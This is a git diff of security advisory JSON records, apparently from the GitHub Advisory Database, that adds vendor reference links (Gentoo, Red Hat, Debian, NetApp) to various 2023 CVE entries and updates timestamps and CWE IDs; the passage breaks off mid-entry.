a/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json b/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json index 415d0de2533e0..ce78247c6f280 100644 --- a/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json +++ b/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json b/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json index b1c53cdda4c25..2e83dce3496b6 100644 --- a/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json +++ b/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json index d5b19ff8d3cfc..7eb9682fcabe4 100644 --- a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json +++ b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json @@ -85,6 +85,14 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0554" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-5178" diff --git a/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json b/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json index 0f60c8046f781..c79b8b08c8b8a 100644 --- a/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json +++ b/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://gitlab.com/wireshark/wireshark/-/issues/19369" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-09" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5559" diff --git a/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json b/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json index 3222426a21be0..ce47e7b49306b 100644 --- a/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json +++ b/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json b/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json index e6c55c2ffeaf9..85722bca0592e 100644 --- a/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json +++ b/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6606" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-6606" diff --git a/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json b/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json index 79a613cf4fab9..ed90d860da6cb 100644 --- a/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json +++ b/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json b/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json index 6948ae974a4d0..eddec106a992f 100644 --- a/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json +++ b/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-62rj-gv2c-8ghr", - "modified": "2024-01-03T18:30:50Z", + "modified": "2024-02-08T12:30:48Z", "published": "2023-12-22T18:30:30Z", "aliases": [ "CVE-2023-42465" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202401-29" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0002/" + }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/12/21/9" diff --git a/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json b/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json index 0095b18841ba3..eff38a860cd71 100644 --- a/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json +++ b/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38174" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json b/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json index 40a4dd65caff3..663d1ec7484a4 100644 --- a/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json +++ b/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6JL4VHZMHFGEGQYTF74533ZNRWMCMMR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5585" diff --git a/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json b/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json index f71f3bd05c4a8..70497015b8883 100644 --- a/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json +++ b/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json b/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json index 38d96528ef242..952975f758eda 100644 --- a/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json +++ b/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json b/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json index f97e510ac1a10..0c1f3cc9bf88c 100644 --- a/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json +++ b/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json b/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json index 785f6d69804a8..f24c7d7e8d457 100644 --- a/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json +++ b/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json b/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json index 571bd292120d8..3df3df243c107 100644 --- a/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json +++ b/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8mrc-5phh-m9pc", - "modified": "2023-12-24T00:30:29Z", + "modified": "2024-02-08T12:30:48Z", "published": "2023-12-24T00:30:29Z", "aliases": [ "CVE-2023-7090" @@ -29,6 +29,14 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255723" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0001/" + }, { "type": "WEB", "url": "https://www.sudo.ws/releases/legacy/#1.8.28" diff --git a/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json b/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json index 6397ddc1350ee..0746e1cd34884 100644 --- a/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json +++ b/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/" + }, { "type": "WEB", "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html" diff --git a/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json b/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json index ad0f01b6ec14b..3e92ffda5bdb4 100644 --- a/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json +++ b/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json b/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json index 5f5268b618533..51ec54955dc6b 100644 --- a/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json +++ b/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249523" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNEEWAACXQCEEAKSG7XX2D5YDRWLCIZJ/" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json b/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json index 1a43d5b2a2535..b79e3f48587c6 100644 --- a/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json +++ b/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json b/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json index a90b25f20aefd..ec753b62ff3c3 100644 --- a/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json +++ b/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json @@ -41,6 +41,14 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253986" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/" + }, { "type": "WEB", "url": "https://lore.kernel.org/netdev/20231211083758.1082853-1-jiri@resnulli.us/" diff --git a/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json b/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json index 3a4d9a4f17778..f1e95d4c5a4b6 100644 --- a/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json +++ b/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json @@ -97,6 +97,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-December/003435.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240125-0003/" diff --git a/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json b/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json index 4acc3b0971948..bf797158a404f 100644 --- a/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json +++ b/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-20", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json b/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json index 1f002f6d1925c..a4be472d39217 100644 --- a/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json +++ b/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json b/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json index 897565202cf14..836ec15bfd036 100644 --- a/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json +++ b/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json b/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json index 316a87b08669c..cf0c3575d2dac 100644 --- a/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json +++ b/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35618" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json b/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json index 2279296a34802..b5fa2b1c9dd7c 100644 --- a/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json +++ b/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://github.com/eeenvik1/CVE-2023-51764" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00020.html" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JQ5WXFCW2N6G2PH3JXDTYW5PH5EBQEGO/" diff --git a/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json b/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json index fdf23cac2ad83..760ec8b6b24a8 100644 --- a/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json +++ b/advisories/unreviewed/2023/12/GHSA-j5r4-2mjg-6xcc/GHSA-j5r4-2mjg-6xcc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j5r4-2mjg-6xcc", - "modified": "2023-12-18T18:30:21Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-12-18T18:30:21Z", "aliases": [ "CVE-2023-6817" @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/12/22/13" diff --git a/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json b/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json index afb298f6fe38a..979a446b65ae3 100644 --- a/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json +++ b/advisories/unreviewed/2023/12/GHSA-j6r8-x8pp-9mcq/GHSA-j6r8-x8pp-9mcq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6r8-x8pp-9mcq", - "modified": "2023-12-27T00:30:25Z", + "modified": "2024-02-01T18:31:07Z", "published": "2023-12-20T21:30:35Z", "aliases": [ "CVE-2023-49272" diff --git a/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json b/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json index 623565c8b42f9..5eefaf0250f33 100644 --- a/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json +++ b/advisories/unreviewed/2023/12/GHSA-jqrg-rvpw-5fw5/GHSA-jqrg-rvpw-5fw5.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json b/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json index d6bddff316b6b..5eb36c14348a4 100644 --- a/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json +++ b/advisories/unreviewed/2023/12/GHSA-jr4h-682w-x2ph/GHSA-jr4h-682w-x2ph.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6610" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-6610" diff --git a/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json b/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json index 58743a69ed3ed..846c7d069c8b5 100644 --- a/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json +++ b/advisories/unreviewed/2023/12/GHSA-m2ff-6895-cr34/GHSA-m2ff-6895-cr34.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m2ff-6895-cr34", - "modified": "2023-12-19T15:30:30Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-12-19T15:30:30Z", "aliases": [ "CVE-2023-6932" @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json b/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json index 8a3b1928ee9de..6f90298a7a567 100644 --- a/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json +++ b/advisories/unreviewed/2023/12/GHSA-mgj3-mgvf-x3r8/GHSA-mgj3-mgvf-x3r8.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36880" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json b/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json index 0c1f6e85456b2..0c5df152caa35 100644 --- a/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json +++ b/advisories/unreviewed/2023/12/GHSA-mw7v-292c-8697/GHSA-mw7v-292c-8697.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42890" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT214035" @@ -60,6 +64,10 @@ { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2023/Dec/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/12/18/1" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json b/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json index 21c96f0d1bb9c..b9e22356616cf 100644 --- a/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json +++ b/advisories/unreviewed/2023/12/GHSA-qw8w-gvwg-qc22/GHSA-qw8w-gvwg-qc22.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json b/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json index ec946494bf0fc..a5133271257a7 100644 --- a/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json +++ b/advisories/unreviewed/2023/12/GHSA-rm87-ccvw-q747/GHSA-rm87-ccvw-q747.json @@ -17,13 +17,25 @@ ], "references": [ + { + "type": "WEB", + "url": "https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962" + }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45779" }, + { + "type": "WEB", + "url": 